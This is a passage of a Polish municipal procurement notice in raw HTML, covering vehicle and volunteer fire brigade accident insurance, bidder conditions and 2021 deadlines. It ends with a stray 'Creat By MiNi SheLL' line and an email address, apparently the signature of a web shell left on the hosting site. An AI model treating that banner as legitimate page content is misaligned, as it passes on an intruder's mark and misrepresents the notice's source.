gdy poniósł on szkodę, jednak podjął decyzję o nieodtwarzaniu zniszczonego mienia. Interes majątkowy Ubezpieczonego odnosi się do wszystkich pojazdów będących w posiadaniu Ubezpieczonego, zakupionych lub przejętych w trakcie trwania Umowy Generalnej Ubezpieczenia wraz z ich wyposażeniem standardowym oraz dodatkowym. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 25327,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66516100-1 - Usługi ubezpieczenia pojazdów mechanicznych od odpowiedzialności cywilnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</p> <p class="mb-0">66514110-0 - Usługi ubezpieczeń pojazdów mechanicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">warunki ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> sekcja II: 1.1.	Przedmiotem ubezpieczenia są następstwa nieszczęśliwych wypadków członków Ochotniczych Straży Pożarnych i Młodzieżowych Drużyn Pożarniczych powodujące:<br/>1.1.1.	uszkodzenie ciała;<br/>1.1.2.	stały lub długotrwały uszczerbek na zdrowiu; <br/>1.1.3.	rozstroju zdrowia;<br/>1.1.4.	śmierć Ubezpieczonego.<br/>1.2.	Ubezpieczenie jest zawarte:<br/>1.2.1.	w formie imiennej – powstałych w czasie działań w akcji ratowniczej lub ćwiczeniach, zgodnie z Ustawą o ochronie przeciwpożarowej zwanej dalej Ustawą;<br/>1.2.2.	w formie bezimiennej – powstałych w czasie innym niż akcja ratownicza lub ćwiczenia (w szczególności: w czasie drogi podczas wezwania do akcji, podczas zawodów strażackich lub innych zawodów mających na celu podniesienie sprawności i umiejętności).<br/>1.3.	Nieszczęśliwym wypadkiem jest nagłe zdarzenie, w którego następstwie Ubezpieczony niezależnie od swojej woli doznał uszkodzenia ciała, uszczerbku na zdrowiu, rozstroju zdrowia lub zmarł. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 11358,60 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">warunki ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.5.1.	Zamawiający w zakresie zdolności do występowania w obrocie gospodarczym nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/>6.5.2.	Zamawiający wymaga w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Wykonawca jest zobowiązany wykazać, że posiada uprawnienia do wykonywania działalności stanowiącej przedmiot niniejszego zamówienia tzn.: prowadzi działalność ubezpieczeniową w myśl ustawy z dn. 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. 2021 r. poz. 1130), na podstawie zezwolenia, co najmniej w zakresie tożsamym z przedmiotem niniejszego zamówienia:<br/>6.5.2.1.	dla części 1 – obejmujące grupę: 8, 9 i 13 opisane w Załączniku nr 1 do ustawy o działalności ubezpieczeniowej i reasekuracyjnej;<br/>6.5.2.2.	dla części 2 – obejmujące grupę: 1, 3, 10, i 18 opisane w Załączniku nr 1 do ustawy o działalności ubezpieczeniowej i reasekuracyjnej;<br/>6.5.2.3.	dla części 3 – obejmujące grupę: 1 opisaną w Załączniku nr 1 do ustawy o działalności ubezpieczeniowej i reasekuracyjnej.<br/>6.5.3.	Zamawiający w zakresie sytuacji ekonomicznej lub finansowej nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/>6.5.4.	Zamawiający w zakresie zdolności technicznej lub zawodowej nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> aktualne na dzień składania ofert oświadczenie lub oświadczenia, o którym mowa w pkt 6.1 Dział I SWZ, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>7.4.1.	są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu o udzielenie zamówienia publicznego i zawarcia Umowy o wykonanie zamówienia publicznego. <br/>7.4.2.	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest samodzielnie wykazać brak podstaw wykluczenia z postępowania oraz spełnianie warunków udziału w postępowaniu składając wraz z ofertą oświadczenia, o których mowa w pkt. 7.1 i 7.2.<br/>7.4.3.	Oferta Wykonawców występujących wspólnie musi być podpisana i oznaczona w taki sposób, by prawnie zobowiązywała wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia.<br/>7.4.4.	Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>7.4.5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do ofert oświadczenie, z którego wynika, które usługi wykonują poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">8.2.1.	Ofertę wraz z wymaganymi do niej załącznikami, należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu. Klucz publiczny niezbędny do zaszyfrowania oferty przez Wykonawcę jest dostępny dla wykonawców na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-29 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 8.3.6.	Zamawiający dopuszcza możliwość komunikacji za pomocą poczty elektronicznej, na adres email: sekretariat@gmina-radomsko.pl , podczas gdy ze względów technicznych i organizacyjnych od Zamawiającego korespondencja ta będzie mogła oprócz wyżej wskazanego adresu, także wychodzić spod adresu: mpawlikowski@gmina-radomsko.pl . Nie dotyczy to składania ofert.

Creat By MiNi SheLL
Email: jattceo@gmail.com